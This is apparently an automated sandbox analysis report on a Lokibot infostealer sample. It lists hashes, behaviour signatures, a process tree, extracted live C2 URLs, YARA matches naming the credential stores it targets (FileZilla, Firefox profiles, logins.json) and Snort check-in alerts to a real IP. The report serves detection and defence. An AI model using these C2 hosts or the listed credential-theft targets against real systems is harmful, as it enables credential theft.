Edit tour

Windows Analysis Report
Payment_copy28476450.exe

Overview

General Information

Sample Name:	Payment_copy28476450.exe
Analysis ID:	753423
MD5:	70e90926399154c2708801a73cf53d99
SHA1:	0eaff8f1cde17a392d9e7935bae96f21c91acc3c
SHA256:	c36de6d07a8ce4407cb59a275dbf8c04d05844903bb6d566f295ccd13a2d4ce6
Tags:	exeloki
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Lokibot

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Yara detected aPLib compressed binary

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file registry)

Machine Learning detection for sample

Executable has a suspicious name (potential lure to open the executable)

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Enables debug privileges

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

Payment_copy28476450.exe (PID: 160 cmdline: C:\Users\user\Desktop\Payment_copy28476450.exe MD5: 70E90926399154C2708801A73CF53D99)

wcycejenv.exe (PID: 588 cmdline: "C:\Users\user\AppData\Local\Temp\wcycejenv.exe" C:\Users\user\AppData\Local\Temp\stvrrcrc.d MD5: 3182BEF520A1E9F52BE3755C25E4C3B0)

conhost.exe (PID: 584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

wcycejenv.exe (PID: 5332 cmdline: "C:\Users\user\AppData\Local\Temp\wcycejenv.exe" C:\Users\user\AppData\Local\Temp\stvrrcrc.d MD5: 3182BEF520A1E9F52BE3755C25E4C3B0)

cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000003.00000002.510358180.0000000000737000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: wcycejenv.exe PID: 5332	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: wcycejenv.exe PID: 5332	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: wcycejenv.exe PID: 5332	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x6381:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xf3a2:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.0.wcycejenv.exe.400000.4.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
3.2.wcycejenv.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.wcycejenv.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.2.wcycejenv.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.2.wcycejenv.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
3.2.wcycejenv.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.2.wcycejenv.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.2.wcycejenv.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
3.2.wcycejenv.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.2.wcycejenv.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.wcycejenv.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.2.wcycejenv.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.2.wcycejenv.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
3.2.wcycejenv.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.2.wcycejenv.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.2.wcycejenv.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
3.2.wcycejenv.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.wcycejenv.exe.610000.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
1.2.wcycejenv.exe.610000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.wcycejenv.exe.610000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.wcycejenv.exe.610000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.wcycejenv.exe.610000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
1.2.wcycejenv.exe.610000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.wcycejenv.exe.610000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.wcycejenv.exe.610000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.2.wcycejenv.exe.610000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.wcycejenv.exe.610000.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13278:$s1: http:// 0x16233:$s1: http:// 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13280:$s2: https:// 0x13278:$f1: http:// 0x16233:$f1: http:// 0x13280:$f2: https://
1.2.wcycejenv.exe.610000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.wcycejenv.exe.610000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.wcycejenv.exe.610000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.wcycejenv.exe.610000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
1.2.wcycejenv.exe.610000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
3.0.wcycejenv.exe.400000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.wcycejenv.exe.400000.4.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
3.0.wcycejenv.exe.400000.4.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
3.0.wcycejenv.exe.400000.4.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
3.0.wcycejenv.exe.400000.4.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
3.0.wcycejenv.exe.400000.4.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
3.0.wcycejenv.exe.400000.4.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
3.0.wcycejenv.exe.400000.4.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 35 entries

Snort Signatures

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249737802025381 11/24/22-19:55:31.199874
SID:	2025381
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249748802021641 11/24/22-19:55:53.130311
SID:	2021641
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249750802825766 11/24/22-19:55:57.329298
SID:	2825766
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249751802021641 11/24/22-19:55:59.376338
SID:	2021641
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859881532014169 11/24/22-19:55:09.708351
SID:	2014169
Source Port:	59881
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497332025483 11/24/22-19:55:24.906100
SID:	2025483
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497352025483 11/24/22-19:55:28.867256
SID:	2025483
Source Port:	80
Destination Port:	49735
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249736802024318 11/24/22-19:55:29.163584
SID:	2024318
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497372025483 11/24/22-19:55:32.908191
SID:	2025483
Source Port:	80
Destination Port:	49737
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497392025483 11/24/22-19:55:36.924861
SID:	2025483
Source Port:	80
Destination Port:	49739
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249754802024318 11/24/22-19:56:04.818902
SID:	2024318
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249736802024313 11/24/22-19:55:29.163584
SID:	2024313
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856122532014169 11/24/22-19:54:54.866804
SID:	2014169
Source Port:	56122
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249754802024313 11/24/22-19:56:04.818902
SID:	2024313
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249711802024313 11/24/22-19:54:38.624655
SID:	2024313
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249705802021641 11/24/22-19:54:27.228813
SID:	2021641
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249719802025381 11/24/22-19:54:53.033944
SID:	2025381
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249729802825766 11/24/22-19:55:13.852615
SID:	2825766
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249722802025381 11/24/22-19:54:59.769485
SID:	2025381
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249747802825766 11/24/22-19:55:51.131718
SID:	2825766
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249711802024318 11/24/22-19:54:38.624655
SID:	2024318
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249740802025381 11/24/22-19:55:37.776321
SID:	2025381
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249750802025381 11/24/22-19:55:57.329298
SID:	2025381
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249737802825766 11/24/22-19:55:31.199874
SID:	2825766
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249714802825766 11/24/22-19:54:45.091814
SID:	2825766
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.850343532014169 11/24/22-19:55:13.761219
SID:	2014169
Source Port:	50343
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249741802021641 11/24/22-19:55:39.990050
SID:	2021641
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249709802025381 11/24/22-19:54:33.518227
SID:	2025381
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249723802021641 11/24/22-19:55:01.692450
SID:	2021641
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249727802025381 11/24/22-19:55:09.788187
SID:	2025381
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249700802021641 11/24/22-19:54:18.249997
SID:	2021641
